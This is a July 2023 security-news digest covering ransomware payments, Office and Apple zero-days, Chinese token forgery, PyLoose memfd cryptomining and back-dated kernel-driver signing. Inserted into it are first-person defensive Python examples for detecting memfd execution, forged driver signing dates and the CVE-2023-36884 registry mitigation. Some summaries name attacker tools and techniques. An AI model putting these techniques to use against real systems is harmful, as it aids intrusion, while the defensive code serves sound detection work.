                2023-07-12 https://www.helpnetsecurity.com/2023/07/12/ransomware-industry-profitability/

                Ransomware has been a hugely profitable industry for criminal gangs for the last few years. The total amount of ransom paid since 2020 is estimated to be at least $2 billion, and this has both motivated and enabled the groups who are profiting from this activity to become more professional. These groups are emulating the legitimate tech ecosystem and seeking greater efficiencies and profits: they outsource common, complex problems; they subcontract work; and they employ … More

                Autosummary: Have an incident response plan – If you have threat intelligence, self-awareness, controls, and policies, you can devise a plan of action for your organization to follow in the event of an incident. Actions on target are often achieved by living off the land, i.e., abusing already present operating system tools and the use of common commodity post-exploitation frameworks such as Cobalt Strike, Metasploit, and Sliver.


                How Google Cloud’s AML AI redefines the fight against money laundering

                financial
                2023-07-12 https://www.helpnetsecurity.com/2023/07/12/anna-knizhnik-google-cloud-aml-ai/

                Google Cloud’s AML AI represents an advancement in the fight against money laundering. By replacing outdated transaction monitoring systems and embracing AI technology, financial institutions can now stay ahead of evolving financial crime risks, improve operational efficiency, ensure regulatory compliance, and deliver a superior customer experience. In this Help Net Security interview, Anna Knizhnik, Director, Product Management, Cloud AI, Financial Services, at Google Cloud, explains how Google Cloud’s AML AI outperforms current systems, lowers operational … More

                Autosummary: In this Help Net Security interview, Anna Knizhnik, Director, Product Management, Cloud AI, Financial Services, at Google Cloud, explains how Google Cloud’s AML AI outperforms current systems, lowers operational costs, enhances governance, and improves the customer experience by reducing false positives and minimizing compliance verification checks.


                Free entry-level cybersecurity training and certification exam

                ciber
                2023-07-12 https://www.helpnetsecurity.com/2023/07/12/certified-in-cybersecurity-guide/

                The Ultimate Guide to Certified in Cybersecurity (CC) covers everything you need to know about the entry-level credential recognized by organizations worldwide. Inside, learn how CC starts you on your path to advanced cybersecurity certification and how to access free Official (ISC)² Online Self-Paced Training and one free CC exam. As cyberthreats continue to escalate worldwide, the need for security experts is at an all-time high. Yet talent is scarce. Research shows the cybersecurity workforce … More



                Unpatched Office zero-day CVE-2023-36884 actively exploited in targeted attacks

                exploits
                2023-07-12 https://securityaffairs.com/148380/hacking/office-zero-day-cve-2023-36884.html

                Microsoft warned today that an unpatched zero-day in multiple Windows and Office products is being actively exploited in the wild. The issue, tracked as CVE-2023-36884, was exploited by nation-state actors and cybercriminals to gain remote code execution […]

                Autosummary: Mitigation registry key: Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION, with the following application names added under it as REG_DWORD values with data 1: Excel.exe, Graph.exe, MSAccess.exe, MSPub.exe, PowerPoint.exe, Visio.exe, WinProj.exe, WinWord.exe, Wordpad.exe.


                Ransomware payments on record-breaking trajectory for 2023

                exploits
                2023-07-12 https://www.bleepingcomputer.com/news/security/ransomware-payments-on-record-breaking-trajectory-for-2023/
                Data from the first half of the year indicates that ransomware activity is on track to break previous records, seeing a rise in the number of payments, both big and small. [...]

                Autosummary: According to a report by blockchain analysis firm Chainalysis, ransomware is the only cryptocurrency crime category seeing a rise this year, with all others, including hacks, scams, malware, abuse material sales, fraud shops, and darknet market revenue, recording a steep decline.


                DirectDefense partners with SCADAfence to strengthen industrial cybersecurity

                industry ciber
                2023-07-12 https://www.helpnetsecurity.com/2023/07/12/directdefense-scadafence/

                DirectDefense announced its partnership with SCADAfence to enhance industrial cybersecurity and safeguard OT Networks in the era of IIoT. The SCADAfence Platform enables critical infrastructure and manufacturing organizations with complex Operational Technology (OT) networks to embrace the benefits of the Industrial Internet of Things (IIoT) by reducing cyber risks and mitigating operational threats. With the rise of the IIoT, OT devices are becoming more interconnected, allowing for enhanced automation and remote monitoring. While these technologies … More

                The post DirectDefense partners with SCADAfence to strengthen industrial cybersecurity appeared first on Help Net Security.

                "

                Autosummary: By leveraging advanced algorithms, machine learning, and AI, it automatically discovers assets, detects anomalies, and identifies security risks that can compromise the availability and reliability of OT networks. "


CyberCatch collaborates with Proficio to protect users against cyber threats

                industry
                2023-07-12 https://www.helpnetsecurity.com/2023/07/12/cybercatch-proficio/

                CyberCatch and Proficio announced a strategic partnership to join forces to market and deliver a combined AI-enabled solution for organizations worldwide. CyberCatch’s proprietary, artificial intelligence-enabled (AI) Software-as-a-Service (SaaS) solution is designed to help organizations implement all mandated and necessary controls, detect control failures promptly, and facilitate their resolution, enabling continuous compliance and cyber risk mitigation. Proficio’s MDR services provide round-the-clock protection, enabling organizations to proactively identify and respond to potential threats in real-time. With an … More

The post CyberCatch collaborates with Proficio to protect users against cyber threats appeared first on Help Net Security.


                Same code, different ransomware? Leaks kick-start myriad of new variants

                exploits ransomware
                2023-07-12 https://www.helpnetsecurity.com/2023/07/12/h1-2023-eset-threat-report/

                Threat landscape trends demonstrate the impressive flexibility of cybercriminals as they continually seek out fresh methods of attack, including exploiting vulnerabilities, gaining unauthorized access, compromising sensitive information, and defrauding individuals, according to the H1 2023 ESET Threat Report. Microsoft: An interesting threat landscape One of the reasons for shifts in attack patterns is stricter security policies introduced by Microsoft, particularly on opening macro-enabled files. ESET telemetry data also suggests that operators of the once-notorious Emotet … More

                The post Same code, different ransomware? Leaks kick-start myriad of new variants appeared first on Help Net Security.

                "

                Autosummary: "


                Chinese hackers forged authentication tokens to breach government emails

                government
                2023-07-12 https://www.helpnetsecurity.com/2023/07/12/storm-0558-forged-authentication-tokens/

Sophisticated hackers have accessed email accounts of organizations and government agencies via authentication tokens they forged by using an acquired Microsoft account (MSA) consumer signing key, the company revealed on Tuesday. “The threat actor Microsoft links to this incident is an adversary based in China that Microsoft calls Storm-0558. We assess this adversary is focused on espionage, such as gaining access to email systems for intelligence collection.” This specific hacking group primarily targets government … More

                The post Chinese hackers forged authentication tokens to breach government emails appeared first on Help Net Security.

                "

                Autosummary: “If you have not been contacted, our investigations indicate that you have not been impacted,” the company added, and promised to share “new details and recommendations as appropriate.” "


                Ransomware Extortion Skyrockets in 2023, Reaching $449.1 Million and Counting

                exploits
                2023-07-12 https://thehackernews.com/2023/07/ransomware-extortion-skyrockets-in-2023.html
Ransomware has emerged as the only cryptocurrency-based crime to grow in 2023, with cybercriminals extorting nearly $175.8 million more than they did a year ago, according to findings from Chainalysis. "Ransomware attackers are on pace for their second-biggest year ever, having extorted at least $449.1 million through June," the blockchain analytics firm said in a midyear crypto crime report

Autosummary: "Clop's preference for targeting larger companies (>$5 million/year revenue) and capitalizing on newer-but-disclosed vulnerabilities has been the primary driver of its success in the first half of 2023," Sophos researcher David Wallace said in a report earlier this week, calling the group a "loud, adaptable, persistent player."


                Microsoft Thwarts Chinese Cyber Attack Targeting Western European Governments

                government
                2023-07-12 https://thehackernews.com/2023/07/microsoft-thwarts-chinese-cyber-attack.html
Microsoft on Tuesday revealed that it repelled a cyber attack staged by a Chinese nation-state actor targeting two dozen organizations, some of which include government agencies, in a cyber espionage campaign designed to acquire confidential data. The attacks, which commenced on May 15, 2023, entailed access to email accounts affecting approximately 25 entities and a small number of related

Autosummary: "This type of espionage-motivated adversary seeks to abuse credentials and gain access to data residing in sensitive systems," Charlie Bell, executive vice president of Microsoft Security, said.


                Rogue IT security worker who impersonated ransomware gang is sentenced to jail

                exploits ransomware
                2023-07-12 https://grahamcluley.com/rogue-it-security-worker-who-impersonated-ransomware-gang-sentenced-to-jail/
A British IT worker who exploited a ransomware attack against the company he worked for, in an attempt to extort money from them for himself, has been sentenced to jail for three years and seven months.

Autosummary: Ashley Liles of Fleetwood, Letchworth Garden City, Hertfordshire, was sentenced yesterday at Reading Crown Court for blackmail and unauthorised access to a computer with intent to commit other offences.


                New PyLoose Linux malware mines crypto directly from memory

                exploits
                2023-07-12 https://www.bleepingcomputer.com/news/security/new-pyloose-linux-malware-mines-crypto-directly-from-memory/
A new fileless malware named PyLoose has been targeting cloud workloads to hijack their computational resources for Monero cryptocurrency mining. [...]

Autosummary: [Figure: The PyLoose script (Wiz)] "The memory file descriptor, memfd, is a Linux feature that allows the creation of anonymous memory-backed file objects that can be used for various purposes, such as inter-process communication or temporary storage," explains Wiz in the report.
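A payload that is loaded through memfd never touches the filesystem, but it is still visible in procfs: the process's `/proc/<pid>/exe` link resolves to `/memfd:<name> (deleted)` and its executable mappings in `/proc/<pid>/maps` carry the same path. As an added example (my own, not code from BleepingComputer or from the Wiz report), the Python below applies that check to a process table. The sample table is constructed for the example; `collect_live()` builds the same structure from `/proc` on a real Linux host.

```python
import os
import re
from dataclasses import dataclass, field

# A memfd-backed executable shows up in procfs as "/memfd:<name> (deleted)".
# The name is whatever the caller passed to memfd_create(); it is often empty.
MEMFD_RE = re.compile(r"^/memfd:(?P<name>.*?)(?: \(deleted\))?$")


@dataclass
class ProcessSnapshot:
    pid: int
    comm: str                                  # contents of /proc/<pid>/comm
    exe: str                                   # readlink("/proc/<pid>/exe"), "" if unreadable
    maps: list = field(default_factory=list)   # lines of /proc/<pid>/maps


def memfd_findings(snapshots):
    """Return [(pid, comm, reasons)] for processes that execute code out of a memfd."""
    findings = []
    for proc in snapshots:
        reasons = []
        match = MEMFD_RE.match(proc.exe)
        if match:
            reasons.append(f"main executable is memfd '{match.group('name')}'")
        for line in proc.maps:
            # /proc/<pid>/maps fields: address perms offset dev inode [pathname]
            parts = line.split(None, 5)
            if len(parts) == 6 and "x" in parts[1] and parts[5].startswith("/memfd:"):
                reasons.append(f"executable mapping backed by {parts[5]}")
                break
        if reasons:
            findings.append((proc.pid, proc.comm, reasons))
    return findings


def collect_live(proc_root="/proc"):
    """Snapshot every readable process on a Linux host (root is needed to read other users' exe links)."""
    snapshots = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        base = os.path.join(proc_root, entry)
        try:
            with open(os.path.join(base, "comm")) as fh:
                comm = fh.read().strip()
            exe = os.readlink(os.path.join(base, "exe"))
            with open(os.path.join(base, "maps")) as fh:
                maps = fh.read().splitlines()
        except OSError:
            continue  # process exited, kernel thread, or permission denied
        snapshots.append(ProcessSnapshot(int(entry), comm, exe, maps))
    return snapshots


# Constructed sample: an ordinary interpreter, a process whose image lives in an unnamed
# memfd (both the exe link and an r-xp mapping), and a browser that only maps a memfd read-only.
SAMPLE = [
    ProcessSnapshot(1042, "python3", "/usr/bin/python3.11",
                    ["55d2c0400000-55d2c0401000 r-xp 00000000 08:01 1311 /usr/bin/python3.11"]),
    ProcessSnapshot(2317, "python3", "/memfd: (deleted)",
                    ["7f0c6e000000-7f0c6e1a0000 r-xp 00000000 00:05 9921 /memfd: (deleted)"]),
    ProcessSnapshot(2400, "chrome", "/opt/google/chrome/chrome",
                    ["7f11aa000000-7f11aa010000 r--p 00000000 00:05 9950 /memfd:shm (deleted)"]),
]

if __name__ == "__main__":
    for pid, comm, reasons in memfd_findings(SAMPLE):
        print(pid, comm, "; ".join(reasons))
```

memfd is also used legitimately (browsers, language runtimes and systemd all create anonymous memory files), so a hit is a triage signal rather than a verdict; what separates a miner from a browser is the combination with sustained CPU use, an unexpected parent process and outbound connections to a mining pool.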


                Apple re-releases zero-day patch after fixing browsing issue

                exploits
                2023-07-12 https://www.bleepingcomputer.com/news/apple/apple-re-releases-zero-day-patch-after-fixing-browsing-issue/
Apple fixed and re-released emergency security updates addressing a WebKit zero-day vulnerability exploited in attacks. The initial patches had to be withdrawn on Monday due to browsing issues on certain websites. [...]


                SonicWall warns admins to patch critical auth bypass bugs immediately

                exploits
                2023-07-12 https://www.bleepingcomputer.com/news/security/sonicwall-warns-admins-to-patch-critical-auth-bypass-bugs-immediately/
SonicWall warned customers today to urgently patch multiple critical vulnerabilities impacting the company's Global Management System (GMS) firewall management and Analytics network reporting engine software suites. [...]


                Russian state hackers lure Western diplomats with BMW car ads

                government rusia-ucrania
                2023-07-12 https://www.bleepingcomputer.com/news/security/russian-state-hackers-lure-western-diplomats-with-bmw-car-ads/
The Russian state-sponsored hacking group "APT29" (aka Nobelium, Cloaked Ursa) has been using unconventional lures like car listings to entice diplomats in Ukraine to click on malicious links that deliver malware. [...]

Autosummary: [Figure: Fake PNG files contained in the ISO archive (Unit 42)] Unit 42 reports that this campaign has targeted at least 22 of the 80 foreign missions in Kyiv, including those of the United States, Canada, Turkey, Spain, Netherlands, Greece, Estonia, and Denmark.


                US-Mexico border: Will a "floating wall" barrier in the Rio Grande deter migrants?

                latam
                2023-07-12 https://www.bbc.co.uk/news/world-us-canada-66183563?at_medium=RSS&at_campaign=KARANGA
Some fear the controversial new barrier may make the crossing more dangerous for migrants.


                2023 Women"s World Cup: Argentina aim for first win at global tournament

                latam
                2023-07-12 https://www.bbc.co.uk/sport/football/65966147?at_medium=RSS&at_campaign=KARANGA
Seven months after Lionel Messi and his team-mates conquered the world in Qatar, the excitement is lukewarm in Buenos Aires as Argentina prepare for the Women's World Cup.

Autosummary: Argentina's World Cup-winning men's team had to abandon an open-top bus parade in Buenos Aires and instead took a helicopter ride over the millions of ecstatic fans partying in the streets following their World Cup triumph. Up to 40,000 Argentina fans were in Qatar in December but the numbers in New Zealand backing the women for group matches against 2019 quarter-finalists Italy, African champions South Africa and World Cup heavyweights Sweden are likely to be in the hundreds instead of thousands. "Most people in Argentina are fans of football - but women's football, it's not that popular," Daniela Lichinizer, a sports reporter for TN Deportivo in Argentina, tells BBC Sport. [Figure: Florencia Bonsegundo met Lionel Messi in 2019] There are no lucrative sponsorship deals for women's players in Argentina, while forward Estefania Banini - regarded as the Messi of the women's team - has played much of her club football away in Spain.


                Cybersecurity best practices while working in the summer

                ciber
                2023-07-11 https://www.helpnetsecurity.com/2023/07/11/cybersecurity-best-practices-while-working-in-the-summer-video/

                IT teams need help to monitor and enforce BYOD policies during summer months when more employees often travel or work remotely. In this Help Net Security video, Jeremy Ventura, Director, Security Strategy & Field CISO at ThreatX, discusses how employees increasingly rely on personal devices to access corporate data during the summer, which could open the door to cyber criminals seeking to penetrate corporate networks.

                The post Cybersecurity best practices while working in the summer appeared first on Help Net Security.

                "

                Autosummary: "


                Industry responses and strategies for navigating the tides of DDoS attacks

                industry
                2023-07-11 https://www.helpnetsecurity.com/2023/07/11/ddos-attacks-fight-video/

                It is important not to underestimate the potentially devastating impact of DDoS attacks. Organizations of all sizes should take proactive measures to mitigate and safeguard against DDoS attacks, ensuring the continuity and resilience of their operations. Throughout this Help Net Security video round-up, experts emphasize the need for a collective effort in the fight against DDoS attacks. Complete videos Bryant Rump, Principal Security Architect at Neustar Security Services, talks about the challenges of mitigating immense … More

                The post Industry responses and strategies for navigating the tides of DDoS attacks appeared first on Help Net Security.

                "

                Autosummary: "


                Apple Issues Urgent Patch for Zero-Day Flaw Targeting iOS, iPadOS, macOS, and Safari

                exploits
                2023-07-11 https://thehackernews.com/2023/07/apple-issues-urgent-patch-for-zero-day.html
Apple has released Rapid Security Response updates for iOS, iPadOS, macOS, and Safari web browser to address a zero-day flaw that it said has been actively exploited in the wild. The WebKit bug, cataloged as CVE-2023-37450, could allow threat actors to achieve arbitrary code execution when processing specially crafted web content. The iPhone maker said it addressed the issue with improved checks


                Foxconn: Apple supplier drops out of $20bn India factory plan

                industry
                2023-07-11 https://www.bbc.co.uk/news/business-66160997?at_medium=RSS&at_campaign=KARANGA
Some analysts say Foxconn's decision marks a setback to the country's technology industry ambitions.


                Apple pushes out emergency fix for actively exploited zero-day (CVE-2023-37450)

                exploits
                2023-07-11 https://www.helpnetsecurity.com/2023/07/11/cve-2023-37450/

                Apple has patched an actively exploited zero-day vulnerability (CVE-2023-37450) by releasing Rapid Security Response updates for iPhones, iPads and Macs running the latest versions of its operating systems. The vulnerability has also been fixed with a regular security update in Safari (16.5.2), so users running macOS Big Sur and macOS Monterey can also implement the fix. About CVE-2023-37450 As per usual, Apple doesn’t say much about the fixed vulnerability. All we know is that CVE-2023-37450: … More

                The post Apple pushes out emergency fix for actively exploited zero-day (CVE-2023-37450) appeared first on Help Net Security.

                "

                Autosummary: Smaller security updates In May 2023, Apple started delivering Rapid Security Response updates to owners of Apple smartphones, tablets and computers running the latest versions of iOS, iPadOS, and macOS. "


                Beware of Big Head Ransomware: Spreading Through Fake Windows Updates

                exploits ransomware
                2023-07-11 https://thehackernews.com/2023/07/beware-of-big-head-ransomware-spreading.html
A developing piece of ransomware called Big Head is being distributed as part of a malvertising campaign that takes the form of bogus Microsoft Windows updates and Word installers. Big Head was first documented by Fortinet FortiGuard Labs last month, when it discovered multiple variants of the ransomware that are designed to encrypt files on victims' machines in exchange for a cryptocurrency

Autosummary: In addition, the malware disables the Task Manager to prevent users from terminating or investigating its process and aborts itself if the machine's language matches that of Russian, Belarusian, Ukrainian, Kazakh, Kyrgyz, Armenian, Georgian, Tatar, and Uzbek.


                VMware warns customers of exploit available for critical vRealize RCE flaw CVE-2023-20864

                exploits
                2023-07-11 https://securityaffairs.com/148346/hacking/vmware-vmware-rce-exploit.html

VMware has warned customers that exploit code is publicly available for CVE-2023-20864, a critical RCE vulnerability in the VMware Aria Operations for Logs analysis tool (formerly vRealize Log Insight). VMware Aria Operations for Networks (formerly vRealize Network Insight) is […]

                The post VMware warns customers of exploit available for critical vRealize RCE flaw CVE-2023-20864 appeared first on Security Affairs.

                "

                Autosummary: "


                Cybercriminals Evolve Antidetect Tooling for Mobile OS-Based Fraud

                ciber
                2023-07-11 https://securityaffairs.com/148341/cyber-crime/antidetect-tooling-mobile-fraud.html

                Resecurity identified the emergence of adversarial mobile Android-based Antidetect Tooling for Mobile OS-Based Fraud. Resecurity has identified the emergence of adversarial mobile Android-based tools (called “mobile anti-detects”), like Enclave and McFly, as a new frontier in fraud tradecraft evolution. These tools are used by criminals involved in online-banking theft to impersonate compromised account holders and […]

                The post Cybercriminals Evolve Antidetect Tooling for Mobile OS-Based Fraud appeared first on Security Affairs.

                "

                Autosummary: This report from Resecurity includes a comprehensive list of the top PC-based antidetect kits, such as AntBrowser, Lalicat, Aezakmi, ClonBrowser, MultiLogin, Sphere, GoLogin, Incognition, VMMask, Dolphin{anty}, VMLogin, IndigoBrowser, SessionBox, Octo Browser, MoreLogin, Undetectable, LinkenSphere, and Kameleo. "


                Alteryx Analytics Automation powered by AWS allows CFOs to modernize financial processes

                financial industry
                2023-07-11 https://www.helpnetsecurity.com/2023/07/11/alteryx-analytics-automation/

                Alteryx announced decision intelligence and intelligent automation capabilities on AWS designed to empower chief financial officers (CFOs) and finance leaders to embrace cloud and data analytics as strategic tools for their modernization goals. “Analytic insights help us tailor digital transformation solutions based on our clients’ needs to achieve the greatest impact for their business,” said Ana Margarita Albir, president at ADL Labs. “Leveraging Alteryx and AWS, we are able to integrate capabilities across any data … More

                The post Alteryx Analytics Automation powered by AWS allows CFOs to modernize financial processes appeared first on Help Net Security.

                "

                Autosummary: “Organizations can benefit from templates that help data analysts and line-of-business users to use, customize, extend, and integrate enterprise data with intelligent automation workflows that assist with record to report, procure to pay, and order to cash processes.” "


                SCARLETEEL Cryptojacking Campaign Exploiting AWS Fargate in Ongoing Campaign

                exploits
                2023-07-11 https://thehackernews.com/2023/07/scarleteel-cryptojacking-campaign.html
Cloud environments continue to be at the receiving end of an ongoing advanced attack campaign dubbed SCARLETEEL, with the threat actors now setting their sights on Amazon Web Services (AWS) Fargate. "Cloud environments are still their primary target, but the tools and techniques used have adapted to bypass new security measures, along with a more resilient and stealthy command and control

Autosummary: "Cloud environments are still their primary target, but the tools and techniques used have adapted to bypass new security measures, along with a more resilient and stealthy command and control architecture," Sysdig security researcher Alessandro Brucato said in a new report shared with The Hacker News.


                Apple issued Rapid Security Response updates to fix a zero-day but pulled them due to a Safari bug

                exploits
                2023-07-11 https://securityaffairs.com/148360/security/apple-issued-rapid-security-response.html

                Apple released Rapid Security Response updates for iOS, iPadOS, macOS, and Safari web browser to address an actively exploited zero-day. Apple has released Rapid Security Response updates for iOS, iPadOS, macOS, and Safari web browser to address a zero-day flaw, tracked as CVE-2023-37450, that has been actively exploited in the wild. Tricking the victim into processing specially crafted web content may lead to […]

                The post Apple issued Rapid Security Response updates to fix a zero-day but pulled them due to a Safari bug appeared first on Security Affairs.

                "

                Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Rapid Security Response) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Microsoft July 2023 Patch Tuesday warns of 6 zero-days, 132 flaws

                exploits
                2023-07-11 https://www.bleepingcomputer.com/news/microsoft/microsoft-july-2023-patch-tuesday-warns-of-6-zero-days-132-flaws/
                Today is Microsoft"s July 2023 Patch Tuesday, with security updates for 132 flaws, including six actively exploited and thirty-seven remote code execution vulnerabilities. [...] "

                Autosummary: Excel.exe Graph.exe MSAccess.exe MSPub.exe PowerPoint.exe Visio.exe WinProj.exe WinWord.exe Wordpad.exe This flaw was disclosed by Microsoft Threat Intelligence, Vlad Stolyarov, Clement Lecigne and Bahare Sabouri of Google’s Threat Analysis Group (TAG), Paul Rascagneres and Tom Lancaster with Volexity, and the Microsoft Office Product Group Security Team. Microsoft says that the flaw was discovered by Vlad Stolyarov and Maddie Stone of Googles Threat Analysis Group (TAG) CVE-2023-36884 - Office and Windows HTML Remote Code Execution Vulnerability Microsoft has released guidance on a publicly disclosed, unpatched zero-day that allows remote code execution using specially-crafted Microsoft Office documents. "


                Hackers exploit Windows policy to load malicious kernel drivers

                exploits
                2023-07-11 https://www.bleepingcomputer.com/news/security/hackers-exploit-windows-policy-to-load-malicious-kernel-drivers/
Microsoft blocked code signing certificates predominantly used by Chinese hackers and developers to sign and load malicious kernel mode drivers on breached systems by exploiting a Windows policy loophole. [...]

Autosummary: The third exception in the policy covers drivers signed with an end-entity certificate issued before July 29th, 2015 that chains to a supported cross-signed CA. A new report by Cisco Talos explains that Chinese threat actors are exploiting this exception by using two open-source tools, "HookSignTool" and "FuckCertVerify", to alter the signing date of malicious drivers to a date before July 29th, 2015.


                Deutsche Bank confirms provider breach exposed customer data

                financial
                2023-07-11 https://www.bleepingcomputer.com/news/security/deutsche-bank-confirms-provider-breach-exposed-customer-data/
Deutsche Bank AG has confirmed to BleepingComputer that a data breach on one of its service providers has exposed its customers' data in a likely MOVEit Transfer data-theft attack. [...]

Autosummary: The public German bank, which is one of the largest in the world, having total assets of $1.5 trillion and an annual net income of $6.3 billion, stated that the incident impacted customers in Germany who used its account switching service in 2016, 2017, 2018, and 2020.


                Hackers Exploit Windows Policy Loophole to Forge Kernel-Mode Driver Signatures

                exploits
                2023-07-11 https://thehackernews.com/2023/07/hackers-exploit-windows-policy-loophole.html
A Microsoft Windows policy loophole has been observed being exploited primarily by native Chinese-speaking threat actors to forge signatures on kernel-mode drivers. "Actors are leveraging multiple open-source tools that alter the signing date of kernel mode drivers to load malicious and unverified drivers signed with expired certificates," Cisco Talos said in an exhaustive two-part report shared

Autosummary: What's more, it has been observed that HookSignTool has been used to re-sign cracked drivers in order to bypass digital rights management (DRM) integrity checks, with an actor named "Juno_Jr" releasing a cracked version of PrimoCache, a legitimate software caching solution, in a Chinese software cracking forum on November 9, 2022. "The third exception creates a loophole that allows a newly compiled driver to be signed with non-revoked certificates issued prior to or expired before July 29, 2015, provided that the certificate chains to a supported cross-signed certificate authority," the cybersecurity company said.
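The loophole in both of the driver-signing stories above (the BleepingComputer item and this one) turns on the signing date: the tools re-sign a freshly built driver so that its Authenticode signature appears to predate July 29, 2015 and fall inside the validity window of an old, leaked certificate. As an added example (mine, not code from Cisco Talos or Microsoft), the Python below reads the compile timestamp from a driver's PE header and checks it against the signing time and the certificate's validity period: a binary cannot legitimately be compiled after it was signed, nor signed outside the certificate's lifetime. The signing time and certificate dates are passed in as parameters, since pulling them out of the Authenticode blob needs a tool such as osslsigncode or signtool; the PE images here are constructed minimal headers, not real drivers.

```python
import struct
from datetime import datetime, timezone

# Date before which an end-entity certificate must have been issued for the
# third exception in Microsoft's driver signing policy to apply.
CUTOFF = datetime(2015, 7, 29, tzinfo=timezone.utc)


def pe_compile_time(image):
    """Return the COFF TimeDateStamp of a PE image as an aware UTC datetime."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    # COFF header: Machine (2), NumberOfSections (2), TimeDateStamp (4), ...
    (stamp,) = struct.unpack_from("<I", image, e_lfanew + 8)
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def assess_signature(image, signing_time, cert_not_before, cert_not_after):
    """Return the reasons a driver's signature looks back-dated; an empty list means consistent."""
    compiled = pe_compile_time(image)
    reasons = []
    if not cert_not_before <= signing_time <= cert_not_after:
        reasons.append("signing time lies outside the certificate's validity period")
    if compiled > signing_time:
        reasons.append("PE compile timestamp is later than the signing time")
    if signing_time < CUTOFF <= compiled:
        reasons.append("signature predates the 2015-07-29 cutoff but the binary was built after it")
    return reasons


def make_pe(compile_time):
    """Constructed minimal PE image (DOS stub + PE signature + COFF header) for the example."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE header starts right after the stub
    coff = struct.pack("<HHIIIHH", 0x8664, 1, int(compile_time.timestamp()), 0, 0, 0, 0)
    return bytes(dos) + b"PE\0\0" + coff


def utc(year, month, day):
    return datetime(year, month, day, tzinfo=timezone.utc)


# Constructed cases: a driver legitimately signed in 2014, and a 2022 build re-signed
# with the same old certificate and a back-dated signing time (what the tools produce).
LEGIT = (make_pe(utc(2014, 1, 15)), utc(2014, 3, 1), utc(2013, 6, 1), utc(2016, 6, 1))
FORGED = (make_pe(utc(2022, 11, 1)), utc(2014, 3, 1), utc(2013, 6, 1), utc(2016, 6, 1))

if __name__ == "__main__":
    for label, case in (("legit", LEGIT), ("forged", FORGED)):
        print(label, assess_signature(*case) or ["consistent"])
```

The PE timestamp can itself be edited, and binaries from deterministic builds (Microsoft's own among them) carry a hash rather than a time in that field, so a hit is a triage signal: confirm by checking whether the certificate is on Microsoft's revocation list and whether the countersignature timestamp comes from a real timestamping authority.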


                HCA Healthcare data breach impacted 11 million patients

                financial
                2023-07-11 https://securityaffairs.com/148371/data-breach/hca-healthcare-data-breach.html

HCA Healthcare this week disclosed a data breach that exposed the personal information of roughly 11 million patients. The organization discovered the security breach on July 5 when a threat actor claimed the hack on an underground […]

                The post HCA Healthcare data breach impacted 11 million patients appeared first on Security Affairs.

                "

                Autosummary: As proof of the hack, the threat actors posted stolen info for some of the patients, including: Patient name, city, state, and zip code; Patient email, telephone number, date of birth, gender; and Patient service date, location and next appointment date. "


                Microsoft: Unpatched Office zero-day exploited in NATO summit attacks

                exploits
                2023-07-11 https://www.bleepingcomputer.com/news/security/microsoft-unpatched-office-zero-day-exploited-in-nato-summit-attacks/
Microsoft disclosed today an unpatched zero-day security bug in multiple Windows and Office products exploited in the wild to gain remote code execution via malicious Office documents. [...]

Autosummary: Those not using these protections can add the following application names to the HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key as values of type REG_DWORD with data 1: Excel.exe, Graph.exe, MSAccess.exe, MSPub.exe, PowerPoint.exe, Visio.exe, WinProj.exe, WinWord.exe, Wordpad.exe. However, it's important to note that setting this registry key to block exploitation attempts may also impact some Microsoft Office functionality linked to the applications listed above.
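As an added example (my own, not code from Microsoft or BleepingComputer), the Python below audits and generates the registry mitigation described above. `audit()` takes the values already present under the key, as `name -> (type, data)`, and lists which of the nine applications are not yet blocked; `reg_file()` emits a `.reg` file that sets the missing ones; `read_live()` reads the key with the standard-library `winreg` module on a Windows host. The snapshot used when not on Windows is constructed for the example.

```python
import sys

KEY_PATH = (r"SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl"
            r"\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION")

# Application names Microsoft lists for the CVE-2023-36884 mitigation.
APPS = ["Excel.exe", "Graph.exe", "MSAccess.exe", "MSPub.exe", "PowerPoint.exe",
        "Visio.exe", "WinProj.exe", "WinWord.exe", "Wordpad.exe"]

REG_DWORD = 4  # same constant as winreg.REG_DWORD


def audit(current):
    """current: {value_name: (type, data)} as read from the key; registry value names are
    case-insensitive. Returns the applications not set to REG_DWORD 1, i.e. still unprotected."""
    present = {name.lower(): (vtype, data) for name, (vtype, data) in current.items()}
    return [app for app in APPS if present.get(app.lower()) != (REG_DWORD, 1)]


def reg_file(apps=APPS):
    """Build a .reg file that sets every name in apps to dword:1 under the policy key."""
    lines = ["Windows Registry Editor Version 5.00", "",
             f"[HKEY_LOCAL_MACHINE\\{KEY_PATH}]"]
    lines += [f'"{app}"=dword:00000001' for app in apps]
    return "\r\n".join(lines) + "\r\n"


def read_live():
    """Read the key from the local registry (Windows only); a missing key means nothing is configured."""
    import winreg
    values = {}
    try:
        key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY_PATH)
    except FileNotFoundError:
        return values
    with key:
        index = 0
        while True:
            try:
                name, data, vtype = winreg.EnumValue(key, index)
            except OSError:
                break  # no more values
            values[name] = (vtype, data)
            index += 1
    return values


# Constructed snapshot: two apps set correctly, one explicitly set to 0, the rest absent.
SAMPLE = {"Excel.exe": (REG_DWORD, 1), "winword.exe": (REG_DWORD, 1), "Visio.exe": (REG_DWORD, 0)}

if __name__ == "__main__":
    current = read_live() if sys.platform == "win32" else SAMPLE
    missing = audit(current)
    if missing:
        sys.stdout.write(reg_file(missing))
```

Apply the generated file with `reg import` from an elevated prompt and re-run the audit; as the text notes, the key can break Office features tied to cross-protocol navigation, so test the affected workflows before rolling it out fleet-wide.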


                Microsoft patches four exploited zero-days, but lags with fixes for a fifth (CVE-2023-36884)

                exploits
                2023-07-11 https://www.helpnetsecurity.com/2023/07/11/cve-2023-36884/

